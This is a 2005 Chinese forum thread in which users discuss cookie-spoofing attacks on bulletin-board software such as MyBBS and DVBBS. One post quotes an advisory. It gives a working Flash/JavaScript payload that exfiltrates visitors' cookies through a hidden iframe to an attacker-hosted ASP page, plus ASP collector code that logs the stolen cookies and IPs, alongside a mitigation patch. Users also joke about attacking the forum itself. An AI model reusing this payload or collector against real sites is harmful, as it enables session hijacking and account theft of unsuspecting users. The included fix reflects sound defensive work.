？？Cookies欺骗！！

subaru · 2005 七月 04, 20:21:28

我不知道这是什么时候的东西，昨天才在网上看到。cookies欺骗，这里有个动画URL http://www.ancn.cn/freetools/mfdh-05/loud/(zt-mfdh-1181)/(zt-mfdh-1181)mybbsjh.rar，大家看看啊，好厉害啊！！！

rainbow · 2005 七月 04, 20:28:03

是什么东西啊？

subaru · 2005 七月 04, 20:33:50

在下来看看吧，去搜搜"cookies欺骗"，又很多文章，刚才看了一下时间，大约是去年的东西～～
最近考试了，忙～～没时间细看～～

rainbow · 2005 七月 04, 20:44:49

哦，是讲这个的......

subaru · 2005 七月 04, 20:49:44

早看过了？你试验过没有？

TombCrow · 2005 七月 04, 22:50:35

拿这个论坛来试试啊～

rainbow · 2005 七月 04, 22:56:36

我没有实验过。呵呵。因为也许会对社会构成一定量的危害，所以俺还是决定看过算数。哈哈~~

TombCrow · 2005 七月 04, 23:12:23

猜猜看，以前侵入这个论坛的人是不是用的Cookies欺骗

rainbow · 2005 七月 04, 23:34:53

不一定哦，呵呵。

subaru · 2005 七月 05, 09:44:34

mybbs的漏洞好像是cookies里只存了ID，验证时也不检查密码。。。另外改密码时也很白痴，居然不要求输入原密码，而是直接输新密码。。。。
dvbbs7。0。1也有漏洞，说是通过cookies可以看到数据库绝对地址。。。
我今天下午在自己的网站上试试～～～
PS：TC，昨天看了一下我的trcn的cookies。。不懂。。。。
但我觉得只要查到数据库绝对地址，从外部SQL注入是件很危险地事情，我下午就试一试：）
动网那些好像已经有解决方法了（我刚搜到的，还是挺早的事情了。。。）

subaru · 2005 七月 05, 09:55:17

引用DVBBS等论坛存在的Cookies偷取漏洞
◇ 此漏洞所涉及版本：:
DVBBS、Discus所有版本，其它论坛未作测试，相信大多数都存在该漏洞

◇ 描述：
由于DVBBS等论坛对Flash采取直接播放形式，导致攻击者可以利用Flash嵌入一段ｊａｖａｓｃｒｉｐｔ代码，达到偷取用户Cookies的目的

◇ 具体分析与利用：
1. 首先准备好一个可以运行ASP的空间，用来存放Cookies
2. 新建一个Flash动画，加入如下代码：
onClipEvent (load) {
url=\"ｊａｖａｓｃｒｉｐｔ:var rng=document.selection.createRange();rng.pasteHTML(\\\"<iframe name=frame_hide style=\'display:none\'></iframe><img src=\\\\\\\"./images/logo.gif\\\\\\\" style=\\\\\\\"display:none\\\\\\\" onload=\\\\\\\"ｊａｖａｓｃｒｉｐｔ:co=documents.cookie;document.all.frame_hide.src=\'http://存放路径/WriteCookies.asp?Cookies=\'+co.split(\'&\');var e=document.all;for(var i=0;i<e.length;i++){if(e(i).tagName==\'A\'){var ss=e(i).outerHTML;}}\\\\\\\">\\\");\"
getURL(url);
}
利用iframe是为了让其它人查觉不到程序的页面跳转
3. 将Flash导出****文件，插入到想要偷取Cookies的论坛上，加入代码[全屏欣赏]
（注，有些论坛是****][****]）
4. 这样，如果有用户进到贴子里面，ｊａｖａｓｃｒｉｐｔ程序就会把该用户的Cookies送到WriteCookies.asp，保存到数据库
5. 至于Cookies欺骗，推荐使用IECookiesView，很多教程都有介绍，在这里就不多说了

◇ 备注
1. 对于禁用Flash的论坛，还可以利用PNG格式的图片嵌入代码偷取
2. 拿到Cookies后，密码是经MD5算法加密过的字符串，如果你喜欢用暴力的话，可以试试去解码，当然，个人是不推荐这种方法的

◇ 解决方案：
1. 禁用Flash，或将Flash改为链接格式，以动网为例，修改INC/ubbcode.asp文件

找到下面两段
re.Pattern=\"(\\[FLASH\\])(.[^\\[]*)(\\[\\/FLASH\\])\"
strContent= re.Replace(strContent,\"<a href=\"\"$2\"\" TARGET=_blank><IMG SRC=pic****.gif border=0 alt=点击开新窗口欣赏该FLASH动画! height=16 width=16>[全屏欣赏]</a>
<OBJECT codeBase=http://download.macromedia.com/pub/shockwave/cabs/flash****lash.cab#version=4,0,2,0 classid=clsid:D27CDB6E-AE6D-11cf-96B8-444553540000 width=500 height=400><PARAM NAME=movie value=\"\"$2\"\"><PARAM NAME=quality value=high><embed src=\"\"$2\"\" quality=high pluginspage=\'http://www.macromedia.com/shockwave/download/index.cgi?P1_Prod_Version=ShockwaveFlash\' ;type=\'application/x-shockwave-flash\' width=500 height=400>$2</embed></OBJECT>\")

re.Pattern=\"(\\[FLASH=*([0-9]*),*([0-9]*)\\])(.[^\\[]*)(\\[\\/FLASH\\])\"
strContent= re.Replace(strContent,\"<a href=\"\"$4\"\" TARGET=_blank><IMG SRC=pic****.gif border=0 alt=点击开新窗口欣赏该FLASH动画! height=16 width=16>[全屏欣赏]</a>
<OBJECT codeBase=http://download.macromedia.com/pub/shockwave/cabs/flash****lash.cab#version=4,0,2,0 classid=clsid:D27CDB6E-AE6D-11cf-96B8-444553540000 width=$2 height=$3><PARAM NAME=movie value=\"\"$4\"\"><PARAM NAME=quality value=high><embed src=\"\"$4\"\" quality=high pluginspage=\'http://www.macromedia.com/shockwave/download/index.cgi?P1_Prod_Version=ShockwaveFlash\' ;type=\'application/x-shockwave-flash\' width=$2 height=$3>$4</embed></OBJECT>\")

改为
re.Pattern=\"(\\[FLASH\\])(.[^\\[]*)(\\[\\/FLASH\\])\"
strContent= re.Replace(strContent,\"<a href=\"\"$2\"\" TARGET=_blank><IMG SRC=pic****.gif border=0 height=16 width=16>[点击打开该Flash文件]</a>\")

re.Pattern=\"(\\[FLASH=*([0-9]*),*([0-9]*)\\])(.[^\\[]*)(\\[\\/FLASH\\])\"
strContent= re.Replace(strContent,\"<a href=\"\"$4\"\" TARGET=_blank><IMG SRC=pic****.gif border=0 height=16 width=16>[点击打开该Flash文件]</a>\")

2. 至于PNG图片的问题，留给写论坛的人自己去解决吧

◇ 附：保存Cookies的简单ASP代码，如果想要加上其他功能，自己稍为修改一下就行了。
Set conn=Server.CreateObject(\"ADODB.Connection\")
conn.Open \"driver={Microsoft Access Driver (*.mdb)};dbq=\"& Server.MapPath(\"CookiesLog.mdb\")
Cookies=request(\"Cookies\")
IP=request.serverVariables(\"remote_host\")
sql=\"insert into co(Cookies,IP) values(\'\"&Cookies&\"\',\'\"&IP&\"\')\"
conn.execute(sql)
set conn=nothing
- 作者： sy_hyp 2005年02月21日, 星期一 16:24

很多。。。。

subaru · 2005 七月 05, 11:36:09

现在新下载的都打补丁了，没办法在自己网站上试验了；（

subaru · 2005 七月 05, 11:37:18

引用下面引用由TombCrow在 2005-07-04 22:50 发表的内容： 拿这个论坛来试试啊～

恭敬不如从命:D :D :D

TombCrow · 2005 七月 05, 13:10:42

我倒觉得以前侵入trcnbbs的不是用的cookies漏洞。因为当时的入侵者取得了后台管理权限。cookies漏洞只适用于仅仅利用cookies判断用户身份的情况，而管理员进行后台登陆的时候是需要session验证的，靠cookies漏洞是无法获得后台管理权限的。

上次对trcnbbs的攻击，应该是利用附件上传功能的漏洞，传上了木马程序。

动网论坛以前也存在上传漏洞，可以通过头像上传功能上传木马程序。

subaru · 2005 七月 05, 13:19:52

引用下面引用由TombCrow在 2005-07-05 13:10 发表的内容： 我倒觉得以前侵入trcnbbs的不是用的cookies漏洞。因为当时的入侵者取得了后台管理权限。cookies漏洞只适用于仅仅利用cookies判断用户身份的情况，而管理员进行后台登陆的时候是需要session验证的，靠cookies漏洞是无法获得后台管理权限的。......

嗯。。。。
怎么改后缀名呢？只能用备份这种方法？

我的社区

站内公告:

？？Cookies欺骗！！

subaru

rainbow

subaru

rainbow

subaru

TombCrow

rainbow

TombCrow

rainbow

subaru

subaru

subaru

subaru

TombCrow

subaru